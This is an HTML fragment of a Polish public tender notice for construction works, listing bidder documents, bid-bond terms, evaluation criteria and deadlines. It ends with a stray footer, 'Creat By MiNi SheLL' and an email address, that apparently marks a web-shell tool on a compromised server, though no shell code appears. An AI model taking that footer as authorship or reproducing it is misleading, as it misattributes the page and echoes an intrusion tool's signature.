                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp,
- zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz
z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie
z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
- informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- informacja z banku lub SKOK potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż określono w Rozdziale V ust. 1 pkt. 2b) SIWZ, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert,
- dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości określonej w Rozdziale V ust. 1 pkt. 2b)  SIWZ,
- wykaz co najmniej 2 robót budowlanych (załącznik nr 5), których zakres obejmował budowę/rozbudowę/modernizację obiektów nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Warunki określone zostały w Rozdziale V ust. 1 pkt. 2c) SIWZ,
- wykaz osób (załącznik nr 6) skierowanych przez Wykonawcę do realizacji niniejszego zamówienia odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami. Warunki określone zostały w Rozdziale V ust. 1 pkt. 2c) SIWZ,<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">- formularz ofertowy (załącznik nr 1 do SIWZ)
- pełnomocnictwa, (jeżeli dotyczy  np. oferta lub załączniki podpisane są przez pełnomocnika wykonawcy)
- potwierdzenie wniesienia wadium:
a)  oryginał gwarancji lub poręczenia  lub
b)  kopia dowodu wykonanej operacji.
- kosztorys ofertowy sporządzony na podstawie przedmiarów robót,
do kosztorysu należy załączyć wykaz materiałów i cen jednostkowych, </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Przed upływem terminu składania ofert Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium, na cały okres związania ofertą w wysokości 150.0000,00 zł (słownie złotych: sto pięćdziesiąt tysięcy). 
2. Wadium może być wniesione w jednej lub kilku z poniższych form: 
1) pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) gwarancjach bankowych, 
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U.z 2016 r. poz. 359). 
3. Wadium wnoszone w pieniądzu Wykonawca wpłaci przelewem na rachunek bankowy nr 49 1010 1049 0070 8313 9120 0000. Na przelewie należy umieścić informację: Wadium w postępowaniu 2001-LO.260.18.2016. 
4. Za termin wniesienia wadium w formie pieniężnej (przelewem) zostanie przyjęty termin uznania rachunku bankowego Zamawiającego.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena ofertowa brutto</td><td>60</td></tr><tr><td>2) udzielona gwarancja</td><td>20</td></tr><tr><td>3) termin wykonania zamówienia</td><td>15</td></tr><tr><td>4) termin płatności faktur</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1) Zamawiający dopuszcza zmiany postanowień umowy zgodnie z art. 142 ust. 5 ustawy Pzp oraz  jeżeli zajdzie co najmniej jedna z okoliczności określonych  w art. 144 ust. 1 ustawy Pzp.
2) Zmiany umowy  wymagają formy pisemnej pod rygorem nieważności z wyjątkiem zmiany osób nadzorujących realizację przedmiotu umowy, która wymaga powiadomienia Stron pisemnie.
3) Zmiany zostały przewidziane w § 20 wzoru umowy  załącznik nr 8 do SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com